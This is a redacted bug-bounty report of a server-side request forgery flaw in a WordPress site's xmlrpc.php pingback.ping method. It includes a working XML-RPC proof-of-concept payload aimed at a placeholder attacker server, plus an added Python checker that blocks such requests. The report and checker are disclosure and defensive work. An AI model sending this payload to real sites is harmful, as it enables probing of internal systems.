Description:
Hi team,
I would like to report a security vulnerability I discovered on your website. I was able to perform Server-Side Request Forgery (SSRF) attacks via the xmlrpc.php file at the https://████████ endpoint.
Using a simple POST request to the xmlrpc.php endpoint, I was able to bypass input validation and send a request to an external URL.
I have attached a proof of concept (PoC) script that demonstrates this vulnerability. It sends a request to my VPS server using the interact.sh client (https://github.com/projectdiscovery/interactsh), but an attacker could use this technique to send requests to any URL of their choosing.
https://www.sonarsource.com/blog/wordpress-core-unauthenticated-blind-ssrf/
https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/
The vulnerability could be used to conduct further attacks, such as accessing internal systems or exfiltrating sensitive data.
███████
XML-RPC server accepts POST requests only.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>https://your server</string></value>
</param>
<param>
<value><string>https://█████/</string></value>
</param>
</params>
</methodCall>
```
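A defensive check for the pingback.ping request shape shown above, as an added example (not the report's own PoC and not WordPress code): it parses the XML-RPC body and blocks the call unless the sourceURI, the URL the server would fetch, is a public http(s) host on a standard port. FAKE_DNS and SAMPLE_BODY are constructed stand-ins so the check runs offline.

```python
import ipaddress
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample resolutions standing in for a DNS lookup (assumption).
FAKE_DNS = {"example.org": "93.184.216.34", "intranet.local": "10.0.0.5"}

# Constructed request body in the same shape as the report's PoC.
SAMPLE_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<methodCall><methodName>pingback.ping</methodName><params>
<param><value><string>http://intranet.local/</string></value></param>
<param><value><string>https://blog.example/?p=1</string></value></param>
</params></methodCall>"""

def parse_method_call(body: str):
    """Return (methodName, [string params]) from an XML-RPC methodCall body."""
    root = ET.fromstring(body)
    if root.tag != "methodCall":
        raise ValueError("not a methodCall")
    name = root.findtext("methodName", default="").strip()
    params = [(p.findtext("value/string") or "").strip()
              for p in root.findall("params/param")]
    return name, params

def is_public_url(url: str) -> bool:
    """True only for http(s) URLs on port 80/443 whose host is globally routable."""
    parts = urlsplit(url)
    if (parts.scheme not in ("http", "https") or not parts.hostname
            or parts.port not in (None, 80, 443)):  # pingbacks only on std ports
        return False
    try:
        addr = ipaddress.ip_address(parts.hostname)  # literal IP in the URL
    except ValueError:
        resolved = FAKE_DNS.get(parts.hostname)
        if resolved is None:
            return False  # unknown host: fail closed
        addr = ipaddress.ip_address(resolved)
    return addr.is_global  # False for loopback, RFC 1918, link-local (169.254/16)

def classify_pingback(body: str) -> str:
    """'allow', 'block', or 'ignore' (not a pingback.ping call)."""
    try:
        name, params = parse_method_call(body)
    except (ET.ParseError, ValueError):
        return "block"  # malformed or non-methodCall XML
    if name != "pingback.ping":
        return "ignore"
    # sourceURI is the URL the server would fetch; a malformed param count blocks
    source_uri = params[0] if len(params) == 2 else ""
    return "allow" if is_public_url(source_uri) else "block"
```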
I would recommend implementing input validation and filtering to prevent these types of attacks in the future. Please let me know if you require any additional information or if you have any questions.